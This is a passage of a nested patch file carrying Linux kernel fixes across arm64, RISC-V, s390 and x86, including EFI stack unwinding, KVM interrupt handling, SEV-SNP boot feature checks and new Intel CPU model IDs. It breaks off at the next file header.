++++ b/arch/arm64/kernel/stacktrace.c
+@@ -5,6 +5,7 @@
+  * Copyright (C) 2012 ARM Ltd.
+  */
+ #include <linux/kernel.h>
++#include <linux/efi.h>
+ #include <linux/export.h>
+ #include <linux/ftrace.h>
+ #include <linux/sched.h>
+@@ -12,6 +13,7 @@
+ #include <linux/sched/task_stack.h>
+ #include <linux/stacktrace.h>
+ 
++#include <asm/efi.h>
+ #include <asm/irq.h>
+ #include <asm/stack_pointer.h>
+ #include <asm/stacktrace.h>
+@@ -186,6 +188,13 @@ void show_stack(struct task_struct *tsk, unsigned long *sp, const char *loglvl)
+ 			: stackinfo_get_unknown();		\
+ 	})
+ 
++#define STACKINFO_EFI						\
++	({							\
++		((task == current) && current_in_efi())		\
++			? stackinfo_get_efi()			\
++			: stackinfo_get_unknown();		\
++	})
++
+ noinline noinstr void arch_stack_walk(stack_trace_consume_fn consume_entry,
+ 			      void *cookie, struct task_struct *task,
+ 			      struct pt_regs *regs)
+@@ -199,6 +208,9 @@ noinline noinstr void arch_stack_walk(stack_trace_consume_fn consume_entry,
+ #if defined(CONFIG_VMAP_STACK) && defined(CONFIG_ARM_SDE_INTERFACE)
+ 		STACKINFO_SDEI(normal),
+ 		STACKINFO_SDEI(critical),
++#endif
++#ifdef CONFIG_EFI
++		STACKINFO_EFI,
+ #endif
+ 	};
+ 	struct unwind_state state = {
+diff --git a/arch/arm64/kvm/vgic/vgic-v3.c b/arch/arm64/kvm/vgic/vgic-v3.c
+index 826ff6f2a4e7b..5bdada3137287 100644
+--- a/arch/arm64/kvm/vgic/vgic-v3.c
++++ b/arch/arm64/kvm/vgic/vgic-v3.c
+@@ -350,26 +350,23 @@ retry:
+  * The deactivation of the doorbell interrupt will trigger the
+  * unmapping of the associated vPE.
+  */
+-static void unmap_all_vpes(struct vgic_dist *dist)
++static void unmap_all_vpes(struct kvm *kvm)
+ {
+-	struct irq_desc *desc;
++	struct vgic_dist *dist = &kvm->arch.vgic;
+ 	int i;
+ 
+-	for (i = 0; i < dist->its_vm.nr_vpes; i++) {
+-		desc = irq_to_desc(dist->its_vm.vpes[i]->irq);
+-		irq_domain_deactivate_irq(irq_desc_get_irq_data(desc));
+-	}
++	for (i = 0; i < dist->its_vm.nr_vpes; i++)
++		free_irq(dist->its_vm.vpes[i]->irq, kvm_get_vcpu(kvm, i));
+ }
+ 
+-static void map_all_vpes(struct vgic_dist *dist)
++static void map_all_vpes(struct kvm *kvm)
+ {
+-	struct irq_desc *desc;
++	struct vgic_dist *dist = &kvm->arch.vgic;
+ 	int i;
+ 
+-	for (i = 0; i < dist->its_vm.nr_vpes; i++) {
+-		desc = irq_to_desc(dist->its_vm.vpes[i]->irq);
+-		irq_domain_activate_irq(irq_desc_get_irq_data(desc), false);
+-	}
++	for (i = 0; i < dist->its_vm.nr_vpes; i++)
++		WARN_ON(vgic_v4_request_vpe_irq(kvm_get_vcpu(kvm, i),
++						dist->its_vm.vpes[i]->irq));
+ }
+ 
+ /**
+@@ -394,7 +391,7 @@ int vgic_v3_save_pending_tables(struct kvm *kvm)
+ 	 * and enabling of the doorbells have already been done.
+ 	 */
+ 	if (kvm_vgic_global_state.has_gicv4_1) {
+-		unmap_all_vpes(dist);
++		unmap_all_vpes(kvm);
+ 		vlpi_avail = true;
+ 	}
+ 
+@@ -444,7 +441,7 @@ int vgic_v3_save_pending_tables(struct kvm *kvm)
+ 
+ out:
+ 	if (vlpi_avail)
+-		map_all_vpes(dist);
++		map_all_vpes(kvm);
+ 
+ 	return ret;
+ }
+diff --git a/arch/arm64/kvm/vgic/vgic-v4.c b/arch/arm64/kvm/vgic/vgic-v4.c
+index ad06ba6c9b009..a413718be92b8 100644
+--- a/arch/arm64/kvm/vgic/vgic-v4.c
++++ b/arch/arm64/kvm/vgic/vgic-v4.c
+@@ -222,6 +222,11 @@ void vgic_v4_get_vlpi_state(struct vgic_irq *irq, bool *val)
+ 	*val = !!(*ptr & mask);
+ }
+ 
++int vgic_v4_request_vpe_irq(struct kvm_vcpu *vcpu, int irq)
++{
++	return request_irq(irq, vgic_v4_doorbell_handler, 0, "vcpu", vcpu);
++}
++
+ /**
+  * vgic_v4_init - Initialize the GICv4 data structures
+  * @kvm:	Pointer to the VM being initialized
+@@ -283,8 +288,7 @@ int vgic_v4_init(struct kvm *kvm)
+ 			irq_flags &= ~IRQ_NOAUTOEN;
+ 		irq_set_status_flags(irq, irq_flags);
+ 
+-		ret = request_irq(irq, vgic_v4_doorbell_handler,
+-				  0, "vcpu", vcpu);
++		ret = vgic_v4_request_vpe_irq(vcpu, irq);
+ 		if (ret) {
+ 			kvm_err("failed to allocate vcpu IRQ%d\n", irq);
+ 			/*
+diff --git a/arch/arm64/kvm/vgic/vgic.h b/arch/arm64/kvm/vgic/vgic.h
+index 0c8da72953f06..23e280fa0a16f 100644
+--- a/arch/arm64/kvm/vgic/vgic.h
++++ b/arch/arm64/kvm/vgic/vgic.h
+@@ -331,5 +331,6 @@ int vgic_v4_init(struct kvm *kvm);
+ void vgic_v4_teardown(struct kvm *kvm);
+ void vgic_v4_configure_vsgis(struct kvm *kvm);
+ void vgic_v4_get_vlpi_state(struct vgic_irq *irq, bool *val);
++int vgic_v4_request_vpe_irq(struct kvm_vcpu *vcpu, int irq);
+ 
+ #endif
+diff --git a/arch/arm64/mm/fault.c b/arch/arm64/mm/fault.c
+index 74f76514a48d0..3eb2825d08cff 100644
+--- a/arch/arm64/mm/fault.c
++++ b/arch/arm64/mm/fault.c
+@@ -30,6 +30,7 @@
+ #include <asm/bug.h>
+ #include <asm/cmpxchg.h>
+ #include <asm/cpufeature.h>
++#include <asm/efi.h>
+ #include <asm/exception.h>
+ #include <asm/daifflags.h>
+ #include <asm/debug-monitors.h>
+@@ -397,6 +398,9 @@ static void __do_kernel_fault(unsigned long addr, unsigned long esr,
+ 		msg = "paging request";
+ 	}
+ 
++	if (efi_runtime_fixup_exception(regs, msg))
++		return;
++
+ 	die_kernel_fault(msg, addr, esr, regs);
+ }
+ 
+diff --git a/arch/riscv/kernel/head.S b/arch/riscv/kernel/head.S
+index b865046e4dbbc..4bf6c449d78b6 100644
+--- a/arch/riscv/kernel/head.S
++++ b/arch/riscv/kernel/head.S
+@@ -326,7 +326,7 @@ clear_bss_done:
+ 	call soc_early_init
+ 	tail start_kernel
+ 
+-#if CONFIG_RISCV_BOOT_SPINWAIT
++#ifdef CONFIG_RISCV_BOOT_SPINWAIT
+ .Lsecondary_start:
+ 	/* Set trap vector to spin forever to help debug */
+ 	la a3, .Lsecondary_park
+diff --git a/arch/riscv/kernel/probes/simulate-insn.c b/arch/riscv/kernel/probes/simulate-insn.c
+index d73e96f6ed7c5..a20568bd1f1a8 100644
+--- a/arch/riscv/kernel/probes/simulate-insn.c
++++ b/arch/riscv/kernel/probes/simulate-insn.c
+@@ -71,11 +71,11 @@ bool __kprobes simulate_jalr(u32 opcode, unsigned long addr, struct pt_regs *reg
+ 	u32 rd_index = (opcode >> 7) & 0x1f;
+ 	u32 rs1_index = (opcode >> 15) & 0x1f;
+ 
+-	ret = rv_insn_reg_set_val(regs, rd_index, addr + 4);
++	ret = rv_insn_reg_get_val(regs, rs1_index, &base_addr);
+ 	if (!ret)
+ 		return ret;
+ 
+-	ret = rv_insn_reg_get_val(regs, rs1_index, &base_addr);
++	ret = rv_insn_reg_set_val(regs, rd_index, addr + 4);
+ 	if (!ret)
+ 		return ret;
+ 
+diff --git a/arch/riscv/kernel/smpboot.c b/arch/riscv/kernel/smpboot.c
+index 3373df413c882..ddb2afba6d255 100644
+--- a/arch/riscv/kernel/smpboot.c
++++ b/arch/riscv/kernel/smpboot.c
+@@ -39,7 +39,6 @@ static DECLARE_COMPLETION(cpu_running);
+ 
+ void __init smp_prepare_boot_cpu(void)
+ {
+-	init_cpu_topology();
+ }
+ 
+ void __init smp_prepare_cpus(unsigned int max_cpus)
+@@ -48,6 +47,8 @@ void __init smp_prepare_cpus(unsigned int max_cpus)
+ 	int ret;
+ 	unsigned int curr_cpuid;
+ 
++	init_cpu_topology();
++
+ 	curr_cpuid = smp_processor_id();
+ 	store_cpu_topology(curr_cpuid);
+ 	numa_store_cpu_info(curr_cpuid);
+diff --git a/arch/s390/include/asm/debug.h b/arch/s390/include/asm/debug.h
+index 77f24262c25c1..ac665b9670c5d 100644
+--- a/arch/s390/include/asm/debug.h
++++ b/arch/s390/include/asm/debug.h
+@@ -4,8 +4,8 @@
+  *
+  *    Copyright IBM Corp. 1999, 2020
+  */
+-#ifndef DEBUG_H
+-#define DEBUG_H
++#ifndef _ASM_S390_DEBUG_H
++#define _ASM_S390_DEBUG_H
+ 
+ #include <linux/string.h>
+ #include <linux/spinlock.h>
+@@ -487,4 +487,4 @@ void debug_register_static(debug_info_t *id, int pages_per_area, int nr_areas);
+ 
+ #endif /* MODULE */
+ 
+-#endif /* DEBUG_H */
++#endif /* _ASM_S390_DEBUG_H */
+diff --git a/arch/s390/kernel/vmlinux.lds.S b/arch/s390/kernel/vmlinux.lds.S
+index 5ea3830af0ccf..f81d96710595a 100644
+--- a/arch/s390/kernel/vmlinux.lds.S
++++ b/arch/s390/kernel/vmlinux.lds.S
+@@ -79,6 +79,7 @@ SECTIONS
+ 		_end_amode31_refs = .;
+ 	}
+ 
++	. = ALIGN(PAGE_SIZE);
+ 	_edata = .;		/* End of data section */
+ 
+ 	/* will be freed after init */
+@@ -193,6 +194,7 @@ SECTIONS
+ 
+ 	BSS_SECTION(PAGE_SIZE, 4 * PAGE_SIZE, PAGE_SIZE)
+ 
++	. = ALIGN(PAGE_SIZE);
+ 	_end = . ;
+ 
+ 	/*
+diff --git a/arch/s390/kvm/interrupt.c b/arch/s390/kvm/interrupt.c
+index ab569faf0df24..6d74acea5e859 100644
+--- a/arch/s390/kvm/interrupt.c
++++ b/arch/s390/kvm/interrupt.c
+@@ -83,8 +83,9 @@ static int sca_inject_ext_call(struct kvm_vcpu *vcpu, int src_id)
+ 		struct esca_block *sca = vcpu->kvm->arch.sca;
+ 		union esca_sigp_ctrl *sigp_ctrl =
+ 			&(sca->cpu[vcpu->vcpu_id].sigp_ctrl);
+-		union esca_sigp_ctrl new_val = {0}, old_val = *sigp_ctrl;
++		union esca_sigp_ctrl new_val = {0}, old_val;
+ 
++		old_val = READ_ONCE(*sigp_ctrl);
+ 		new_val.scn = src_id;
+ 		new_val.c = 1;
+ 		old_val.c = 0;
+@@ -95,8 +96,9 @@ static int sca_inject_ext_call(struct kvm_vcpu *vcpu, int src_id)
+ 		struct bsca_block *sca = vcpu->kvm->arch.sca;
+ 		union bsca_sigp_ctrl *sigp_ctrl =
+ 			&(sca->cpu[vcpu->vcpu_id].sigp_ctrl);
+-		union bsca_sigp_ctrl new_val = {0}, old_val = *sigp_ctrl;
++		union bsca_sigp_ctrl new_val = {0}, old_val;
+ 
++		old_val = READ_ONCE(*sigp_ctrl);
+ 		new_val.scn = src_id;
+ 		new_val.c = 1;
+ 		old_val.c = 0;
+@@ -126,16 +128,18 @@ static void sca_clear_ext_call(struct kvm_vcpu *vcpu)
+ 		struct esca_block *sca = vcpu->kvm->arch.sca;
+ 		union esca_sigp_ctrl *sigp_ctrl =
+ 			&(sca->cpu[vcpu->vcpu_id].sigp_ctrl);
+-		union esca_sigp_ctrl old = *sigp_ctrl;
++		union esca_sigp_ctrl old;
+ 
++		old = READ_ONCE(*sigp_ctrl);
+ 		expect = old.value;
+ 		rc = cmpxchg(&sigp_ctrl->value, old.value, 0);
+ 	} else {
+ 		struct bsca_block *sca = vcpu->kvm->arch.sca;
+ 		union bsca_sigp_ctrl *sigp_ctrl =
+ 			&(sca->cpu[vcpu->vcpu_id].sigp_ctrl);
+-		union bsca_sigp_ctrl old = *sigp_ctrl;
++		union bsca_sigp_ctrl old;
+ 
++		old = READ_ONCE(*sigp_ctrl);
+ 		expect = old.value;
+ 		rc = cmpxchg(&sigp_ctrl->value, old.value, 0);
+ 	}
+diff --git a/arch/x86/boot/compressed/ident_map_64.c b/arch/x86/boot/compressed/ident_map_64.c
+index d4a314cc50d6e..321a5011042d4 100644
+--- a/arch/x86/boot/compressed/ident_map_64.c
++++ b/arch/x86/boot/compressed/ident_map_64.c
+@@ -180,6 +180,12 @@ void initialize_identity_maps(void *rmode)
+ 
+ 	/* Load the new page-table. */
+ 	write_cr3(top_level_pgt);
++
++	/*
++	 * Now that the required page table mappings are established and a
++	 * GHCB can be used, check for SNP guest/HV feature compatibility.
++	 */
++	snp_check_features();
+ }
+ 
+ static pte_t *split_large_pmd(struct x86_mapping_info *info,
+diff --git a/arch/x86/boot/compressed/misc.h b/arch/x86/boot/compressed/misc.h
+index 62208ec04ca4b..20118fb7c53bb 100644
+--- a/arch/x86/boot/compressed/misc.h
++++ b/arch/x86/boot/compressed/misc.h
+@@ -126,6 +126,7 @@ static inline void console_init(void)
+ 
+ #ifdef CONFIG_AMD_MEM_ENCRYPT
+ void sev_enable(struct boot_params *bp);
++void snp_check_features(void);
+ void sev_es_shutdown_ghcb(void);
+ extern bool sev_es_check_ghcb_fault(unsigned long address);
+ void snp_set_page_private(unsigned long paddr);
+@@ -143,6 +144,7 @@ static inline void sev_enable(struct boot_params *bp)
+ 	if (bp)
+ 		bp->cc_blob_address = 0;
+ }
++static inline void snp_check_features(void) { }
+ static inline void sev_es_shutdown_ghcb(void) { }
+ static inline bool sev_es_check_ghcb_fault(unsigned long address)
+ {
+diff --git a/arch/x86/boot/compressed/sev.c b/arch/x86/boot/compressed/sev.c
+index c93930d5ccbd0..d63ad8f99f83a 100644
+--- a/arch/x86/boot/compressed/sev.c
++++ b/arch/x86/boot/compressed/sev.c
+@@ -208,6 +208,23 @@ void sev_es_shutdown_ghcb(void)
+ 		error("Can't unmap GHCB page");
+ }
+ 
++static void __noreturn sev_es_ghcb_terminate(struct ghcb *ghcb, unsigned int set,
++					     unsigned int reason, u64 exit_info_2)
++{
++	u64 exit_info_1 = SVM_VMGEXIT_TERM_REASON(set, reason);
++
++	vc_ghcb_invalidate(ghcb);
++	ghcb_set_sw_exit_code(ghcb, SVM_VMGEXIT_TERM_REQUEST);
++	ghcb_set_sw_exit_info_1(ghcb, exit_info_1);
++	ghcb_set_sw_exit_info_2(ghcb, exit_info_2);
++
++	sev_es_wr_ghcb_msr(__pa(ghcb));
++	VMGEXIT();
++
++	while (true)
++		asm volatile("hlt\n" : : : "memory");
++}
++
+ bool sev_es_check_ghcb_fault(unsigned long address)
+ {
+ 	/* Check whether the fault was on the GHCB page */
+@@ -270,6 +287,59 @@ static void enforce_vmpl0(void)
+ 		sev_es_terminate(SEV_TERM_SET_LINUX, GHCB_TERM_NOT_VMPL0);
+ }
+ 
++/*
++ * SNP_FEATURES_IMPL_REQ is the mask of SNP features that will need
++ * guest side implementation for proper functioning of the guest. If any
++ * of these features are enabled in the hypervisor but are lacking guest
++ * side implementation, the behavior of the guest will be undefined. The
++ * guest could fail in non-obvious way making it difficult to debug.
++ *
++ * As the behavior of reserved feature bits is unknown to be on the
++ * safe side add them to the required features mask.
++ */
++#define SNP_FEATURES_IMPL_REQ	(MSR_AMD64_SNP_VTOM |			\
++				 MSR_AMD64_SNP_REFLECT_VC |		\
++				 MSR_AMD64_SNP_RESTRICTED_INJ |		\
++				 MSR_AMD64_SNP_ALT_INJ |		\
++				 MSR_AMD64_SNP_DEBUG_SWAP |		\
++				 MSR_AMD64_SNP_VMPL_SSS |		\
++				 MSR_AMD64_SNP_SECURE_TSC |		\
++				 MSR_AMD64_SNP_VMGEXIT_PARAM |		\
++				 MSR_AMD64_SNP_VMSA_REG_PROTECTION |	\
++				 MSR_AMD64_SNP_RESERVED_BIT13 |		\
++				 MSR_AMD64_SNP_RESERVED_BIT15 |		\
++				 MSR_AMD64_SNP_RESERVED_MASK)
++
++/*
++ * SNP_FEATURES_PRESENT is the mask of SNP features that are implemented
++ * by the guest kernel. As and when a new feature is implemented in the
++ * guest kernel, a corresponding bit should be added to the mask.
++ */
++#define SNP_FEATURES_PRESENT (0)
++
++void snp_check_features(void)
++{
++	u64 unsupported;
++
++	if (!(sev_status & MSR_AMD64_SEV_SNP_ENABLED))
++		return;
++
++	/*
++	 * Terminate the boot if hypervisor has enabled any feature lacking
++	 * guest side implementation. Pass on the unsupported features mask through
++	 * EXIT_INFO_2 of the GHCB protocol so that those features can be reported
++	 * as part of the guest boot failure.
++	 */
++	unsupported = sev_status & SNP_FEATURES_IMPL_REQ & ~SNP_FEATURES_PRESENT;
++	if (unsupported) {
++		if (ghcb_version < 2 || (!boot_ghcb && !early_setup_ghcb()))
++			sev_es_terminate(SEV_TERM_SET_GEN, GHCB_SNP_UNSUPPORTED);
++
++		sev_es_ghcb_terminate(boot_ghcb, SEV_TERM_SET_GEN,
++				      GHCB_SNP_UNSUPPORTED, unsupported);
++	}
++}
++
+ void sev_enable(struct boot_params *bp)
+ {
+ 	unsigned int eax, ebx, ecx, edx;
+diff --git a/arch/x86/events/amd/core.c b/arch/x86/events/amd/core.c
+index d6f3703e41194..4386b10682ce4 100644
+--- a/arch/x86/events/amd/core.c
++++ b/arch/x86/events/amd/core.c
+@@ -1387,7 +1387,7 @@ static int __init amd_core_pmu_init(void)
+ 		 * numbered counter following it.
+ 		 */
+ 		for (i = 0; i < x86_pmu.num_counters - 1; i += 2)
+-			even_ctr_mask |= 1 << i;
++			even_ctr_mask |= BIT_ULL(i);
+ 
+ 		pair_constraint = (struct event_constraint)
+ 				    __EVENT_CONSTRAINT(0, even_ctr_mask, 0,
+diff --git a/arch/x86/events/intel/cstate.c b/arch/x86/events/intel/cstate.c
+index a2834bc93149a..3019fb1926e35 100644
+--- a/arch/x86/events/intel/cstate.c
++++ b/arch/x86/events/intel/cstate.c
+@@ -41,6 +41,7 @@
+  *	MSR_CORE_C1_RES: CORE C1 Residency Counter
+  *			 perf code: 0x00
+  *			 Available model: SLM,AMT,GLM,CNL,ICX,TNT,ADL,RPL
++ *					  MTL
+  *			 Scope: Core (each processor core has a MSR)
+  *	MSR_CORE_C3_RESIDENCY: CORE C3 Residency Counter
+  *			       perf code: 0x01
+@@ -51,50 +52,50 @@
+  *			       perf code: 0x02
+  *			       Available model: SLM,AMT,NHM,WSM,SNB,IVB,HSW,BDW,
+  *						SKL,KNL,GLM,CNL,KBL,CML,ICL,ICX,
+- *						TGL,TNT,RKL,ADL,RPL,SPR
++ *						TGL,TNT,RKL,ADL,RPL,SPR,MTL
+  *			       Scope: Core
+  *	MSR_CORE_C7_RESIDENCY: CORE C7 Residency Counter
+  *			       perf code: 0x03
+  *			       Available model: SNB,IVB,HSW,BDW,SKL,CNL,KBL,CML,
+- *						ICL,TGL,RKL,ADL,RPL
++ *						ICL,TGL,RKL,ADL,RPL,MTL
+  *			       Scope: Core
+  *	MSR_PKG_C2_RESIDENCY:  Package C2 Residency Counter.
+  *			       perf code: 0x00
+  *			       Available model: SNB,IVB,HSW,BDW,SKL,KNL,GLM,CNL,
+  *						KBL,CML,ICL,ICX,TGL,TNT,RKL,ADL,
+- *						RPL,SPR
++ *						RPL,SPR,MTL
+  *			       Scope: Package (physical package)
+  *	MSR_PKG_C3_RESIDENCY:  Package C3 Residency Counter.
+  *			       perf code: 0x01
+  *			       Available model: NHM,WSM,SNB,IVB,HSW,BDW,SKL,KNL,
+  *						GLM,CNL,KBL,CML,ICL,TGL,TNT,RKL,
+- *						ADL,RPL
++ *						ADL,RPL,MTL
+  *			       Scope: Package (physical package)
+  *	MSR_PKG_C6_RESIDENCY:  Package C6 Residency Counter.
+  *			       perf code: 0x02
+  *			       Available model: SLM,AMT,NHM,WSM,SNB,IVB,HSW,BDW,
+  *						SKL,KNL,GLM,CNL,KBL,CML,ICL,ICX,
+- *						TGL,TNT,RKL,ADL,RPL,SPR
++ *						TGL,TNT,RKL,ADL,RPL,SPR,MTL
+  *			       Scope: Package (physical package)
+  *	MSR_PKG_C7_RESIDENCY:  Package C7 Residency Counter.
+  *			       perf code: 0x03
+  *			       Available model: NHM,WSM,SNB,IVB,HSW,BDW,SKL,CNL,
+- *						KBL,CML,ICL,TGL,RKL,ADL,RPL
++ *						KBL,CML,ICL,TGL,RKL,ADL,RPL,MTL
+  *			       Scope: Package (physical package)
+  *	MSR_PKG_C8_RESIDENCY:  Package C8 Residency Counter.
+  *			       perf code: 0x04
+  *			       Available model: HSW ULT,KBL,CNL,CML,ICL,TGL,RKL,
+- *						ADL,RPL
++ *						ADL,RPL,MTL
+  *			       Scope: Package (physical package)
+  *	MSR_PKG_C9_RESIDENCY:  Package C9 Residency Counter.
+  *			       perf code: 0x05
+  *			       Available model: HSW ULT,KBL,CNL,CML,ICL,TGL,RKL,
+- *						ADL,RPL
++ *						ADL,RPL,MTL
+  *			       Scope: Package (physical package)
+  *	MSR_PKG_C10_RESIDENCY: Package C10 Residency Counter.
+  *			       perf code: 0x06
+  *			       Available model: HSW ULT,KBL,GLM,CNL,CML,ICL,TGL,
+- *						TNT,RKL,ADL,RPL
++ *						TNT,RKL,ADL,RPL,MTL
+  *			       Scope: Package (physical package)
+  *
+  */
+@@ -686,6 +687,8 @@ static const struct x86_cpu_id intel_cstates_match[] __initconst = {
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE,		&adl_cstates),
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE_P,	&adl_cstates),
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE_S,	&adl_cstates),
++	X86_MATCH_INTEL_FAM6_MODEL(METEORLAKE,		&adl_cstates),
++	X86_MATCH_INTEL_FAM6_MODEL(METEORLAKE_L,	&adl_cstates),
+ 	{ },
+ };
+ MODULE_DEVICE_TABLE(x86cpu, intel_cstates_match);
+diff --git a/arch/x86/events/intel/uncore.c b/arch/x86/events/intel/uncore.c
+index 6f1ccc57a6921..459b1aafd4d4a 100644
+--- a/arch/x86/events/intel/uncore.c
++++ b/arch/x86/events/intel/uncore.c
+@@ -1833,6 +1833,7 @@ static const struct x86_cpu_id intel_uncore_match[] __initconst = {
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE_P,	&adl_uncore_init),
+ 	X86_MATCH_INTEL_FAM6_MODEL(RAPTORLAKE_S,	&adl_uncore_init),
+ 	X86_MATCH_INTEL_FAM6_MODEL(SAPPHIRERAPIDS_X,	&spr_uncore_init),
++	X86_MATCH_INTEL_FAM6_MODEL(EMERALDRAPIDS_X,	&spr_uncore_init),
+ 	X86_MATCH_INTEL_FAM6_MODEL(ATOM_TREMONT_D,	&snr_uncore_init),
+ 	{},
+ };
+diff --git a/arch/x86/events/msr.c b/arch/x86/events/msr.c
+index ecced3a52668a..c65d8906cbcf4 100644
+--- a/arch/x86/events/msr.c
++++ b/arch/x86/events/msr.c
+@@ -69,6 +69,7 @@ static bool test_intel(int idx, void *data)
+ 	case INTEL_FAM6_BROADWELL_G:
+ 	case INTEL_FAM6_BROADWELL_X:
+ 	case INTEL_FAM6_SAPPHIRERAPIDS_X:
++	case INTEL_FAM6_EMERALDRAPIDS_X:
+ 
+ 	case INTEL_FAM6_ATOM_SILVERMONT:
+ 	case INTEL_FAM6_ATOM_SILVERMONT_D:
+@@ -107,6 +108,8 @@ static bool test_intel(int idx, void *data)
+ 	case INTEL_FAM6_RAPTORLAKE:
+ 	case INTEL_FAM6_RAPTORLAKE_P:
+ 	case INTEL_FAM6_RAPTORLAKE_S:
++	case INTEL_FAM6_METEORLAKE:
++	case INTEL_FAM6_METEORLAKE_L:
+ 		if (idx == PERF_MSR_SMI || idx == PERF_MSR_PPERF)
+ 			return true;
+ 		break;
+diff --git a/arch/x86/include/asm/acpi.h b/arch/x86/include/asm/acpi.h
+index 65064d9f7fa6e..8eb74cf386dbe 100644
+--- a/arch/x86/include/asm/acpi.h
++++ b/arch/x86/include/asm/acpi.h
+@@ -14,6 +14,7 @@
+ #include <asm/mmu.h>
+ #include <asm/mpspec.h>
+ #include <asm/x86_init.h>
++#include <asm/cpufeature.h>
+ 
+ #ifdef CONFIG_ACPI_APEI
+ # include <asm/pgtable_types.h>
+@@ -63,6 +64,13 @@ extern int (*acpi_suspend_lowlevel)(void);
+ /* Physical address to resume after wakeup */
+ unsigned long acpi_get_wakeup_address(void);
+ 
++static inline bool acpi_skip_set_wakeup_address(void)
++{
++	return cpu_feature_enabled(X86_FEATURE_XENPV);
++}
++
++#define acpi_skip_set_wakeup_address acpi_skip_set_wakeup_address
++
+ /*
+  * Check if the CPU can handle C2 and deeper
+  */
+diff --git a/arch/x86/include/asm/msr-index.h b/arch/x86/include/asm/msr-index.h
+index 4a2af82553e4f..91447f018f6e4 100644
+--- a/arch/x86/include/asm/msr-index.h
++++ b/arch/x86/include/asm/msr-index.h
+@@ -571,6 +571,26 @@
+ #define MSR_AMD64_SEV_ES_ENABLED	BIT_ULL(MSR_AMD64_SEV_ES_ENABLED_BIT)
+ #define MSR_AMD64_SEV_SNP_ENABLED	BIT_ULL(MSR_AMD64_SEV_SNP_ENABLED_BIT)
+ 
++/* SNP feature bits enabled by the hypervisor */
++#define MSR_AMD64_SNP_VTOM			BIT_ULL(3)
++#define MSR_AMD64_SNP_REFLECT_VC		BIT_ULL(4)
++#define MSR_AMD64_SNP_RESTRICTED_INJ		BIT_ULL(5)
++#define MSR_AMD64_SNP_ALT_INJ			BIT_ULL(6)
++#define MSR_AMD64_SNP_DEBUG_SWAP		BIT_ULL(7)
++#define MSR_AMD64_SNP_PREVENT_HOST_IBS		BIT_ULL(8)
++#define MSR_AMD64_SNP_BTB_ISOLATION		BIT_ULL(9)
++#define MSR_AMD64_SNP_VMPL_SSS			BIT_ULL(10)
++#define MSR_AMD64_SNP_SECURE_TSC		BIT_ULL(11)
++#define MSR_AMD64_SNP_VMGEXIT_PARAM		BIT_ULL(12)
++#define MSR_AMD64_SNP_IBS_VIRT			BIT_ULL(14)
++#define MSR_AMD64_SNP_VMSA_REG_PROTECTION	BIT_ULL(16)
++#define MSR_AMD64_SNP_SMT_PROTECTION		BIT_ULL(17)
++
++/* SNP feature bits reserved for future use. */
++#define MSR_AMD64_SNP_RESERVED_BIT13		BIT_ULL(13)
++#define MSR_AMD64_SNP_RESERVED_BIT15		BIT_ULL(15)
++#define MSR_AMD64_SNP_RESERVED_MASK		GENMASK_ULL(63, 18)
++
+ #define MSR_AMD64_VIRT_SPEC_CTRL	0xc001011f
+ 
+ /* AMD Collaborative Processor Performance Control MSRs */
+diff --git a/arch/x86/include/uapi/asm/svm.h b/arch/x86/include/uapi/asm/svm.h
+index f69c168391aa5..80e1df482337d 100644
+--- a/arch/x86/include/uapi/asm/svm.h
++++ b/arch/x86/include/uapi/asm/svm.h
+@@ -116,6 +116,12 @@
+ #define SVM_VMGEXIT_AP_CREATE			1
+ #define SVM_VMGEXIT_AP_DESTROY			2
+ #define SVM_VMGEXIT_HV_FEATURES			0x8000fffd
++#define SVM_VMGEXIT_TERM_REQUEST		0x8000fffe
++#define SVM_VMGEXIT_TERM_REASON(reason_set, reason_code)	\
++	/* SW_EXITINFO1[3:0] */					\
++	(((((u64)reason_set) & 0xf)) |				\
++	/* SW_EXITINFO1[11:4] */				\
++	((((u64)reason_code) & 0xff) << 4))
+ #define SVM_VMGEXIT_UNSUPPORTED_EVENT		0x8000ffff
+ 
+ /* Exit code reserved for hypervisor/software use */
+diff --git a/arch/x86/kernel/i8259.c b/arch/x86/kernel/i8259.c
+index 15aefa3f3e18e..f91e5e31aa4f0 100644
+--- a/arch/x86/kernel/i8259.c
++++ b/arch/x86/kernel/i8259.c
+@@ -114,6 +114,7 @@ static void make_8259A_irq(unsigned int irq)
+ 	disable_irq_nosync(irq);
+ 	io_apic_irqs &= ~(1<<irq);
+ 	irq_set_chip_and_handler(irq, &i8259A_chip, handle_level_irq);
++	irq_set_status_flags(irq, IRQ_LEVEL);
+ 	enable_irq(irq);
+ 	lapic_assign_legacy_vector(irq, true);
+ }
+diff --git a/arch/x86/kernel/irqinit.c b/arch/x86/kernel/irqinit.c
+index beb1bada1b0ab..c683666876f1c 100644
+--- a/arch/x86/kernel/irqinit.c
++++ b/arch/x86/kernel/irqinit.c
+@@ -65,8 +65,10 @@ void __init init_ISA_irqs(void)
+ 
+ 	legacy_pic->init(0);
+ 
+-	for (i = 0; i < nr_legacy_irqs(); i++)
++	for (i = 0; i < nr_legacy_irqs(); i++) {
+ 		irq_set_chip_and_handler(i, chip, handle_level_irq);
++		irq_set_status_flags(i, IRQ_LEVEL);
++	}
+ }
+ 
+ void __init init_IRQ(void)
+diff --git a/arch/x86/kvm/vmx/vmx.c b/arch/x86/kvm/vmx/vmx.c
+index 63247c57c72cc..4ae248e87f5ed 100644
+--- a/arch/x86/kvm/vmx/vmx.c
++++ b/arch/x86/kvm/vmx/vmx.c
+@@ -3412,18 +3412,15 @@ static u32 vmx_segment_access_rights(struct kvm_segment *var)
+ {
+ 	u32 ar;
+ 
+-	if (var->unusable || !var->present)
+-		ar = 1 << 16;
+-	else {
+-		ar = var->type & 15;
+-		ar |= (var->s & 1) << 4;
+-		ar |= (var->dpl & 3) << 5;
+-		ar |= (var->present & 1) << 7;
+-		ar |= (var->avl & 1) << 12;
+-		ar |= (var->l & 1) << 13;
+-		ar |= (var->db & 1) << 14;
+-		ar |= (var->g & 1) << 15;
+-	}
++	ar = var->type & 15;
++	ar |= (var->s & 1) << 4;
++	ar |= (var->dpl & 3) << 5;
++	ar |= (var->present & 1) << 7;
++	ar |= (var->avl & 1) << 12;
++	ar |= (var->l & 1) << 13;
++	ar |= (var->db & 1) << 14;
++	ar |= (var->g & 1) << 15;
++	ar |= (var->unusable || !var->present) << 16;
+ 
+ 	return ar;
+ }
+diff --git a/drivers/acpi/resource.c b/drivers/acpi/resource.c
